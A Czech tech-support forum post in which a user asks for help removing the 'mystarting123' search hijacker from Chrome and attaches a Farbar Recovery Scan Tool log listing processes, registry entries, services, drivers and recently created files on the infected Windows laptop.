Nejde odstranit mystarting

[Erža]

Dobrý den.

Nějakým způsobem (zřejmě vlastní nepozorností) se mi dostal do chromu vyhledávač (nebo nevím jak to nazvat) "mystarting". Ani po použití různých návodů na internetu se mi nepodařilo jej odstranit. Byl bych velice rád, kdyby mi někdo pomohl Log FRST níže.

EDIT: Předtím jsem zkoušel 3x použít adwcleaner 6.047...nepomohlo.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 01-06-2017
Ran by Vojtěch (administrator) on ERZA-NTB (02-06-2017 09:34:31)
Running from C:\Users\Vojtěch\Desktop
Loaded Profiles: Vojtěch & Administrator (Available Profiles: Vojtěch & Administrator)
Platform: Windows 8.1 (Update) (X64) Language: Čeština (Česká republika)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Autodesk Inc.) C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe
(Autodesk, Inc.) C:\Program Files (x86)\Autodesk\Content Service\Connect.Service.ContentService.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(pdfforge GmbH) C:\Program Files\PDF Architect 5\creator-ws.exe
(© pdfforge GmbH.) C:\ProgramData\pdfforge\PDF Architect 5 Manager\PDF Architect 5\Architect Manager.exe
() C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe
(Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe
(WildTangent) C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation) C:\Windows\System32\igfxTray.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMEvent.exe
(Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMLockHandler.exe
(Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMTray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Wargaming.net) C:\World_of_Tanks\WargamingGameUpdater.exe
(Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DTAgent.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(VĹ B-TU Ostrava) C:\Program Files (x86)\SafeQ\SafeQ_cli.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\CSISYNCCLIENT.EXE
(Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerTray.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerEvent.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerWinMonitor.exe
(Akamai Technologies, Inc.) C:\Users\Vojtěch\AppData\Local\Akamai\netsession_win.exe
(Akamai Technologies, Inc.) C:\Users\Vojtěch\AppData\Local\Akamai\netsession_win.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Reimage®) C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe
(Reimage®) C:\Program Files\Reimage\Reimage Protector\ReiSystem.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(forum.viry.cz) C:\Users\Vojtěch\Desktop\FRSTLauncher.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2199840 2014-04-02] (NVIDIA Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13671640 2014-04-10] (Realtek Semiconductor)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [213824 2017-05-09] (AVAST Software)
HKLM-x32\...\Run: [SafeQClient] => C:\Program Files (x86)\SafeQ\SafeQ_cli.exe [493568 2015-12-10] (VĹ B-TU Ostrava)
HKLM-x32\...\Run: [ADSK DLMSession] => C:\Program Files (x86)\Common Files\Autodesk Shared\Autodesk Download Manager\DLMSession.exe [1627032 2015-01-28] (Autodesk, Inc.)
HKLM-x32\...\Run: [ADSKAppManager] => C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgr.exe [529480 2016-02-24] (Autodesk Inc.)
HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8944344 2016-09-28] (Piriform Ltd)
HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\...\Run: [Akamai NetSession Interface] => C:\Users\Vojtěch\AppData\Local\Akamai\netsession_win.exe [4691384 2015-09-10] (Akamai Technologies, Inc.)
HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\...\Run: [World of Tanks] => "E:\World_of_Tanks\WargamingGameUpdater.exe"
HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\...\Run: [World of Tanks (1)] => C:\World_of_Tanks\WargamingGameUpdater.exe [3135752 2017-02-28] (Wargaming.net)
HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4701888 2017-02-07] (Disc Soft Ltd)
HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\...\Policies\Explorer: []
HKU\S-1-5-21-3751293310-3690691840-2036008392-500\...\Run: [Pokki] => C:\Windows\system32\rundll32.exe "%LOCALAPPDATA%\Pokki\Engine\Launcher.dll",RunLaunchPlatform
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-05-09] (AVAST Software)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-05-09] (AVAST Software)
ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\Windows\system32\AcSignIcon.dll [2014-02-07] (Autodesk, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk [2014-08-23]
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{8F663C73-0024-4F37-9D83-EC9EE20AACF2}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{CD1B489B-823E-4F1E-906F-D96452103C06}: [DhcpNameServer] 158.196.0.53 158.196.99.166

Internet Explorer:
==================
HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://acer13.msn.com/?pc=ACJB
HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer13.msn.com/?pc=ACJB
HKU\S-1-5-21-3751293310-3690691840-2036008392-500\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://acer13.msn.com/?pc=ACJB
HKU\S-1-5-21-3751293310-3690691840-2036008392-500\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer13.msn.com/?pc=ACJB
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-3751293310-3690691840-2036008392-1001 -> DefaultScope {24F41045-CC84-4AFA-AD46-4129C9CB6FE7} URL =
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-05-26] (Microsoft Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-04-06] (AVAST Software)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-05-26] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2017-05-25] (Microsoft Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-04-06] (AVAST Software)
BHO-x32: PDF Architect 5 Helper -> {AEA429F3-D2D4-4BD7-A03E-5357DA017733} -> C:\Program Files (x86)\PDF Architect 5\creator-ie-helper.dll [2017-02-10] (pdfforge GmbH)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2017-05-25] (Microsoft Corporation)
Toolbar: HKLM-x32 - PDF Architect 5 Toolbar - {84F23192-A475-4038-B5C0-8584777F2DF4} - C:\Program Files (x86)\PDF Architect 5\creator-ie-plugin.dll [2017-02-10] (pdfforge GmbH)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-05-25] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-05-25] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-05-25] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-05-25] (Microsoft Corporation)

FireFox:
========
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2017-05-25] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-05-25] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2013-08-06] ()

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.cz/
CHR DefaultSearchURL: Default -> hxxp://www.mystarting123.com/search/index.php? ... earchTerms}
CHR DefaultSearchKeyword: Default -> mystarting123
CHR Profile: C:\Users\Vojtěch\AppData\Local\Google\Chrome\User Data\Default [2017-06-02]
CHR Extension: (Prezentace Google) - C:\Users\Vojtěch\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-10-05]
CHR Extension: (Dokumenty Google) - C:\Users\Vojtěch\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-10-06]
CHR Extension: (Disk Google) - C:\Users\Vojtěch\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-10-06]
CHR Extension: (YouTube) - C:\Users\Vojtěch\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-10-06]
CHR Extension: (Avast SafePrice) - C:\Users\Vojtěch\AppData\Local\Google\Chrome\User Data\Default\Extensions\eofcbnmajmjmplflapaojjnihcjkigck [2017-05-31]
CHR Extension: (Tabulky Google) - C:\Users\Vojtěch\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-10-05]
CHR Extension: (Dokumenty Google offline) - C:\Users\Vojtěch\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-10-06]
CHR Extension: (Avast Online Security) - C:\Users\Vojtěch\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2017-05-17]
CHR Extension: (FormApps Chrome Extension) - C:\Users\Vojtěch\AppData\Local\Google\Chrome\User Data\Default\Extensions\ilfoopambfaclfjmpiaijnccgcmbeigi [2017-05-31]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Vojtěch\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-09]
CHR Extension: (Gmail) - C:\Users\Vojtěch\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-10-06]
CHR Extension: (Chrome Media Router) - C:\Users\Vojtěch\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-05-13]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdAppMgrSvc; C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe [1145928 2016-02-24] (Autodesk Inc.)
S3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [7346208 2017-05-09] (AVAST Software s.r.o.)
R2 Autodesk Content Service; C:\Program Files (x86)\Autodesk\Content Service\Connect.Service.ContentService.exe [31192 2014-02-07] (Autodesk, Inc.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [263304 2017-05-09] (AVAST Software)
S2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2251992 2013-11-14] (Broadcom Corporation.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [4122824 2017-05-14] (Microsoft Corporation)
R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1471168 2017-02-07] (Disc Soft Ltd)
R3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [2573032 2014-06-12] (Acer Incorporated)
R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [227904 2014-04-24] (WildTangent)
S2 glory; C:\Users\Vojtěch\AppData\Local\glory\glory.dll [909824 2017-06-01] (glory) [File not signed] <==== ATTENTION
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [282096 2014-03-21] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-12-10] (Intel Corporation)
R2 LMSvc; C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe [466664 2014-06-10] (Acer Incorporate)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1617352 2014-04-02] (NVIDIA Corporation)
S3 PDF Architect 5; C:\Program Files\PDF Architect 5\ws.exe [2706824 2017-02-10] (pdfforge GmbH)
S3 PDF Architect 5 CrashHandler; C:\Program Files\PDF Architect 5\crash-handler-ws.exe [1048976 2017-02-10] (pdfforge GmbH)
R2 PDF Architect 5 Creator; C:\Program Files\PDF Architect 5\creator-ws.exe [856976 2017-02-10] (pdfforge GmbH)
R2 PDF Architect 5 Manager; C:\ProgramData\pdfforge\PDF Architect 5 Manager\PDF Architect 5\Architect Manager.exe [985904 2017-02-28] (© pdfforge GmbH.)
R2 ReimageRealTimeProtector; C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [8515952 2017-05-14] (Reimage®)
R2 RichVideo; C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe [254512 2012-04-24] ()
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [311808 2017-05-09] (AVAST Software s.r.o.)
R0 aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [190256 2017-05-09] (AVAST Software s.r.o.)
R0 aswblog; C:\Windows\system32\drivers\aswbloga.sys [334576 2017-05-09] (AVAST Software s.r.o.)
R0 aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [49016 2017-05-09] (AVAST Software s.r.o.)
S3 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [38296 2017-05-09] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [32600 2017-05-09] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [128648 2017-05-09] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [101152 2017-05-09] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [75704 2017-05-09] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1007160 2017-05-09] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [569192 2017-05-09] (AVAST Software)
S2 aswStm; C:\Windows\system32\drivers\aswStm.sys [158880 2017-05-12] (AVAST Software)
R0 aswVmm; C:\Windows\system32\drivers\aswVmm.sys [339696 2017-05-09] (AVAST Software)
R2 atksgt; C:\Windows\System32\DRIVERS\atksgt.sys [310728 2017-05-31] ()
R3 bcbtums; C:\Windows\system32\drivers\bcbtums.sys [170712 2013-11-14] (Broadcom Corporation.)
R3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63a.sys [7549616 2014-02-25] (Broadcom Corporation)
R3 dtlitescsibus; C:\Windows\System32\drivers\dtlitescsibus.sys [30264 2017-05-31] (Disc Soft Ltd)
R3 dtliteusbbus; C:\Windows\System32\drivers\dtliteusbbus.sys [47672 2017-05-31] (Disc Soft Ltd)
R2 lirsgt; C:\Windows\System32\DRIVERS\lirsgt.sys [42696 2017-05-31] ()
R3 LMDriver; C:\Windows\System32\drivers\LMDriver.sys [21360 2013-07-18] (Acer Incorporated)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [100312 2013-12-10] (Intel Corporation)
R3 RadioShim; C:\Windows\System32\drivers\RadioShim.sys [14680 2013-07-18] (Acer Incorporated)
R3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [476888 2014-04-02] (Realsil Semiconductor Corporation)
S4 secdrv; C:\Windows\SysWow64\Drivers\secdrv.sys [163644 2017-05-20] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.) [File not signed]
R3 SynRMIHID; C:\Windows\system32\DRIVERS\SynRMIHID.sys [42736 2014-07-10] (Synaptics Incorporated)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-06-02 09:34 - 2017-06-02 09:35 - 00022883 _____ C:\Users\Vojtěch\Desktop\FRST.txt
2017-06-02 09:34 - 2017-06-02 09:34 - 00000000 ____D C:\FRST
2017-06-02 09:33 - 2017-06-02 09:33 - 00112640 _____ (forum.viry.cz) C:\Users\Vojtěch\Desktop\FRSTLauncher.exe
2017-06-02 09:30 - 2017-06-02 09:30 - 02433536 _____ (Farbar) C:\Users\Vojtěch\Desktop\FRST64.exe
2017-06-02 09:24 - 2017-06-02 09:24 - 00000000 ____D C:\zoek_backup
2017-06-02 09:18 - 2017-06-02 09:19 - 00000000 ____D C:\Users\Vojtěch\AppData\Roaming\Google Chrome Backup
2017-06-02 09:18 - 2017-06-02 09:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Parhelia Tools
2017-06-02 09:18 - 2017-06-02 09:18 - 00000000 ____D C:\Program Files (x86)\Google Chrome Backup
2017-06-02 09:17 - 2017-06-02 09:17 - 01309184 _____ C:\Users\Vojtěch\Desktop\zoek.exe
2017-06-02 09:17 - 2017-06-02 09:17 - 01145364 _____ (Parhelia Tools ) C:\Users\Vojtěch\Downloads\gcb.exe
2017-06-02 08:56 - 2017-06-02 08:56 - 00004278 _____ C:\Windows\System32\Tasks\ReimageUpdater
2017-06-02 08:56 - 2017-06-02 08:56 - 00001959 _____ C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
2017-06-02 08:56 - 2017-06-02 08:56 - 00000000 ____D C:\ProgramData\Reimage Protector
2017-06-02 08:56 - 2017-06-02 08:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair
2017-06-02 08:56 - 2017-06-02 08:56 - 00000000 ____D C:\Program Files\Reimage
2017-06-02 08:55 - 2017-06-02 08:57 - 00000140 _____ C:\Windows\Reimage.ini
2017-06-02 08:55 - 2017-06-02 08:57 - 00000000 ____D C:\rei
2017-06-02 08:55 - 2017-06-02 08:55 - 00604928 _____ (Reimage) C:\Users\Vojtěch\Downloads\ReimageRepair.exe
2017-06-01 15:08 - 2017-06-01 15:08 - 04110280 _____ C:\Users\Vojtěch\Downloads\adwcleaner_6.047.exe
2017-06-01 15:07 - 2017-06-01 21:31 - 00000000 ____D C:\AdwCleaner
2017-06-01 14:50 - 2017-06-01 15:41 - 681891840 _____ C:\Users\Vojtěch\Downloads\01x04 Mrzaci, bastardi a zlomene veci.avi
2017-06-01 11:42 - 2017-06-01 12:37 - 701243392 _____ C:\Users\Vojtěch\Downloads\01x03 Lord Snih.avi
2017-06-01 11:09 - 2017-06-01 11:09 - 00000000 ____D C:\ProgramData\SWCUTemp
2017-06-01 10:44 - 2017-06-01 10:44 - 00008118 _____ C:\Users\Vojtěch\Desktop\cc_20170601_104441.reg
2017-06-01 10:38 - 2017-06-01 10:38 - 00000000 ____D C:\Users\Vojtěch\AppData\Local\glory
2017-06-01 10:38 - 2017-06-01 10:38 - 00000000 ____D C:\Program Files (x86)\MIO
2017-06-01 10:36 - 2017-06-01 10:38 - 00000000 ____D C:\Program Files\MK
2017-06-01 10:36 - 2017-06-01 10:36 - 00000000 ____D C:\Stuvatybugtain
2017-05-31 22:01 - 2017-05-31 22:48 - 658640896 _____ C:\Users\Vojtěch\Downloads\01x02 Kralovska cesta.avi
2017-05-31 17:05 - 2017-06-01 10:41 - 00000000 ____D C:\Program Files (x86)\ZaklĂ­naÄŤ
2017-05-31 17:00 - 2017-05-31 17:00 - 00000000 ____D C:\Users\Vojtěch\AppData\Local\Disc_Soft_Ltd
2017-05-31 16:59 - 2017-05-31 16:59 - 00000000 ____D C:\Users\Public\Documents\Daemon Tools Images
2017-05-31 16:58 - 2017-06-01 10:36 - 00000000 ____D C:\Program Files (x86)\Gretiryanuhusp
2017-05-31 16:58 - 2017-05-31 16:58 - 00000000 ____D C:\Users\Vojtěch\AppData\Local\Stubertain
2017-05-31 16:57 - 2017-06-01 10:44 - 00000000 ____D C:\Users\Vojtěch\AppData\Roaming\DAEMON Tools Lite
2017-05-31 16:57 - 2017-05-31 16:59 - 00000000 ____D C:\Program Files\DAEMON Tools Lite
2017-05-31 16:57 - 2017-05-31 16:57 - 00047672 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtliteusbbus.sys
2017-05-31 16:57 - 2017-05-31 16:57 - 00030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtlitescsibus.sys
2017-05-31 16:57 - 2017-05-31 16:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DAEMON Tools Lite
2017-05-31 16:57 - 2017-05-31 16:57 - 00000000 ____D C:\ProgramData\DAEMON Tools Lite
2017-05-31 16:47 - 2017-05-31 16:47 - 00310728 _____ C:\Windows\system32\Drivers\atksgt.sys
